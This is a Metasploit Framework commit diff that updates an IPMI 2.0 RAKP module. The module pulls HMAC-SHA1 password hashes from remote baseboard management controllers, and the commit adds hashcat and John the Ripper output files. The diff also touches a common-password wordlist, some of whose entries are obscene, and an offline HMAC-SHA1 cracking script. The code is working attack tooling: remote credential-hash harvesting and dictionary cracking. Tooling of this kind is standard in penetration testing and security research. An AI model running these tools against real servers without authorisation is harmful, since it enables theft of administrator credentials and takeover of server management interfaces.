Updated output formats, top 1000 passwords

unstable
HD Moore 2013-06-29 22:01:25 -05:00
parent f0db04c2a6
commit 1e21f0e2aa
3 changed files with 49 additions and 26 deletions

View File

@ -14,6 +14,7 @@ xupamisto
Letmein2
1q2w3e4r
111111
zero2hero
admin123
Flamenco
@ -68,6 +69,7 @@ sun12345
siemens123
hpinvent
goethe
compaq
cisco
butt
brian0711
@ -89,7 +91,6 @@ redhat
netnet
letmein
kalimera
compaq
carpediem
blabla12
blabla
@ -315,10 +316,12 @@ stanley
sofuck
snickers
skywalker
simonb
shin
semmi
sasman
samsun
salope
salamander
rutabaga
rosedale
@ -465,11 +468,9 @@ system32
strasburg
start123
sofresh
simonb
setmefree
seekanddestroy
secure6
salope
root4
roman123
riobravo
@ -518,6 +519,7 @@ number66
nottelling
nike2008
n0d0ubt1
mwmwmw
mvemjsunp
mustang70
munchkin10
@ -568,6 +570,7 @@ goldstar
godblessyou
getoutofhere
genius123
gbpltw
freetown1
freedom35
fotos1
@ -600,6 +603,7 @@ ciscocisco
chile62
check123
ch4ng3m3
cdvcdv
catinthehat
carla123
calvin99
@ -735,6 +739,7 @@ zero0zero
zaq1xsw2cde3
yyl
yes90125
xyuxyu
xunlei
xiazhi
woelco
@ -803,6 +808,7 @@ petert999
pepson
patrickb123
password1`
oqksad
omfglol1
ocnc123
nttocn
@ -816,7 +822,6 @@ netadmin
net101
nemtom1
n0ttelling
mwmwmw
mupali
mumuland
mexx6399
@ -859,7 +864,6 @@ gmmkh
gigi99
ghbdtnbr
gfhjkmrf
gbpltw
g8keeper
fuckbitchesgetmoney
formeforme
@ -877,6 +881,7 @@ ddemde
darwin99
daemon09
d0m1n0
cyphte
cukorborso
ctrls
cti4ever
@ -887,6 +892,7 @@ cmlslc
changeme20
cdwv
cdn123
ccaere
cbtp
cairell
cabajka

View File

@ -1,4 +1,4 @@
##
#
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'IPMI 2.0 RAKP Remote Password Hash Retreival',
'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retreival',
'Description' => %q|
This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
@ -41,7 +41,8 @@ class Metasploit3 < Msf::Auxiliary
OptPath.new('PASS_FILE', [ true, "File containing common passwords for offline cracking, one per line",
File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
]),
OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"]),
OptString.new('OUTPUT_HASHCAT_FILE', [false, "Save captured password hashes in hashcat format"]),
OptString.new('OUTPUT_JOHN_FILE', [false, "Save captured password hashes in john the ripper format"]),
OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
], self.class)
@ -95,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
end
unless r
vprint_status("#{rhost} No response to IPMI open session request, stopping test")
vprint_status("#{rhost} No response to IPMI open session request")
rakp = nil
break
end
sess = process_opensession_reply(*r)
unless sess
vprint_status("#{rhost} Could not understand the response to the open session request, stopping test")
vprint_status("#{rhost} Could not understand the response to the open session request")
rakp = nil
break
end
@ -164,12 +165,18 @@ class Metasploit3 < Msf::Auxiliary
username
)
found = "#{rhost} #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}"
sha1_salt = hmac_buffer.unpack("H*")[0]
sha1_hash = rakp.hmac_sha1.unpack("H*")[0]
found = "#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}"
print_good(found)
# Write the rakp hash to the output file
if @output
@output.write(found + "\n")
# Write the rakp hash to the output files
if @output_cat
@output_cat.write("#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}\n")
end
if @output_jtr
@output_jtr.write("#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\n")
end
# Write the rakp hash to the database
@ -179,7 +186,7 @@ class Metasploit3 < Msf::Auxiliary
:proto => 'udp',
:sname => 'ipmi',
:user => username,
:pass => "#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}",
:pass => "#{sha1_salt}:#{sha1_hash}",
:source_type => "captured",
:active => true,
:type => 'rakp_hmac_sha1_hash'
@ -261,16 +268,22 @@ class Metasploit3 < Msf::Auxiliary
def setup
super
@output = nil
if datastore['OUTPUT_FILE']
@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
@output_cat = nil
@output_jtr = nil
if datastore['OUTPUT_HASHCAT_FILE']
@output_cat = ::File.open(datastore['OUTPUT_HASHCAT_FILE'], "ab")
end
if datastore['OUTPUT_JOHN_FILE']
@output_jtr = ::File.open(datastore['OUTPUT_JOHN_FILE'], "ab")
end
end
def cleanup
super
@output.close if @output
@output = nil
@output_cat.close if @output_cat
@output_cat = nil
@output_jtr.close if @output_jtr
@output_jtr = nil
end
#

View File

@ -4,7 +4,10 @@
#
# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools
# have issues with binary salt values and extremely large salt values. The primary
# goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes
# goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes.
#
# Support for this format is being added to both hashcat and jtr, hopefully
# making this code obsolete.
#
msfbase = __FILE__
@ -63,11 +66,12 @@ count = 0
cracked = 0
word_fd.each_line do |line|
line = line.unpack("C*").pack("C*").strip
line = line.unpack("C*").pack("C*").sub(/\r?\n?$/, '')
next unless line.length > 0
hashes.each do |hinfo|
if OpenSSL::HMAC.digest('sha1', line, hinfo[1]) == hinfo[2]
$stdout.puts "[+] CRACKED " + hinfo[0]+":"+line
$stdout.puts [ hinfo[0], hinfo[1].unpack("H*").first, hinfo[2].unpack("H*").first, line ].join(":")
$stdout.flush
hinfo[3] = true
cracked += 1